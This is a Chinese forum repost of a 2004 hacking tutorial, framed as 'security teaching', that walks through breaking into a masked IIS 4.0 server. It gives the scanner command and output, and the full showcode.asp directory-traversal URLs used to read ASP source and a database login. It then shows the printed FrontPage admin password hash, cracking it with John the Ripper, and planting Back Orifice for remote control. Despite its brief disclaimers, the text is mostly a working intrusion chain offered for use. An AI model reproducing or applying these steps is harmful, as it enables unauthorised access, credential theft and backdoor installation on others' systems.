温柔网

 找回密码
 注册

查看: 604|回复: 0

一篇系统安全教学 一篇系统安全教学

[复制链接]
发表于 2004-4-30 01:33:19 | 显示全部楼层 |阅读模式

--------------------------------------------------------------------------------


  guantou·YESKY
  这是一篇简单的系统安全教学,简单描述了一次攻击,文中涉及的具体地址已经马赛克掉了,文章的目的是提醒大家注意一些常见的系统漏洞和攻击手法,好让你能够将自己的系统作安全的保护。
  若有人因此文导致恶意入侵别人的电脑或网络,本人概不负责!!                 byatom[糖水工作室].
  攻击的目标主机是:“2xx.xx.2xx.1xx”,系统为:“NT”
  1  目标www漏洞扫描
  攻击平台:“NT”
  使用的扫描器为:“twwwscan.exe”
  使用命令为:“twwwscan.exe2xx.xx.2xx.1xx>aa.txt”
  几分钟后扫描完成,生成aa.txt文件,以下为aa.txt内容:
ConnectingHTTPPort-Result:2xx.xx.2xx.1xxConnectSuccess
HTTP/1.1200OK
Server:Microsoft-IIS/4.0
Content-Location:http://2xx.xx.2xx.1xx/Default.htm
Date:XXXXXXXGMT
Content-Type:text/html
Accept-Ranges:bytes
Last-Modified:XXXXXXXXXXXXXXXGMT
ETag:"XXXXXXXXXXXXXXX"
Content-Length:31186
ExAirSampleDoS            Checking: NOT
iCatCarboServer(carbo.dll)      Checking: NOT
.

.
IISDataStreamHole          Checking: NOT
IIS(codebrws.asp)HoleA        Checking: NOT
IIS(codebrws.asp)HoleB        Checking: NOT
IIS(showcode.asp)Hole         Checking: !!!FOUND!!!
SiteServerAdSamples(site.csc)     Checking: NOT
PeerWebserviceHole(ism.dll)      Checking: NOT

  查看发现IIS(showcode.asp)漏洞,很好,这就可以查看目标主机的ASP源代
码。


  2  查看ASP源代码

  发现“2xx.xx.2xx.1xx”主机建有一基于ASP的BBS:
“HTTP://2xx.xx.2xx.1xx/BBS/LIST.ASP”

  查看该文件源代码,在浏览器输入地址:
“HTTP://2xx.xx.2xx.1xx/msadc/samples/SELECTOR/showcode.asp?source=/m
sadc/samp
les/.
./../../../../inetpub/wwwroot/bbs/list.asp”

  查看list.asp源码发现其数据库连接脚本文件为:
“inc/conn.inc”

  查看该文件源代码,在浏览器输入地址:
“HTTP://2xx.xx.2xx.1xx/msadc/samples/SELECTOR/showcode.asp?source=/m
sadc/samp
les/.
./../../../../inetpub/wwwroot/bbs/inc/conn.inc”

  查看conn.inc源码发现其使用数据库为:“SQLServer”,用户:“bbs”,口
令:“bbs”

  现在,使用“SQLViewer”(其实,用随便哪一个SQL客户端都行!)就可以修改该数
据库了!


  3  修改数据库

  你想怎样改就怎样改啦^_^


  4  想一想,除了看ASP,还可以看别的吗?

  呵呵,让我们试一下找一找超级用户的口令,NT的IIS一般都会附带安装FrontPage服务扩展程序,管理员可以使用FrontPage远程管理网站,这个 FrontPage的授权访问用户和口令默认情况下就是本机的超级用户,用户名和口令信息保存在文件service.pwd中,那么……Getit!

  查看该文件内容,在浏览器输入地址:
“HTTP://2xx.xx.2xx.1xx/msadc/samples/SELECTOR/showcode.asp?source=/m
sadc/samp
les/.
./../../../../inetpub/wwwroot/_vti_pvt/service.pwd”

  得到:
#-FrontPage-
Administrator:b4OQKs.e.uGTk

  5  解口令

  看到这个口令的加密形式是不是很眼熟呀?
  呵呵,不错,正是UNIX上常用的DES加密,好乐,轻车熟路搬出john来跑吧!

  6  解出口令乐?OK!这台机器是你的了,放个BO上去遥控一下吧。

  再次重申,Hack别人主机之后不要破坏别人主机中的资料,此篇文章仅作为教育目的,不主张你随便入侵他人主机……请勿将这类技术使用于破坏!
黑白道 - 21Road.com 为您搜集一切 !

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|温柔网 ( 浙ICP备13033583号-8 )

GMT+8, 2024-12-4 01:31 , Processed in 0.035346 second(s), 23 queries .

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表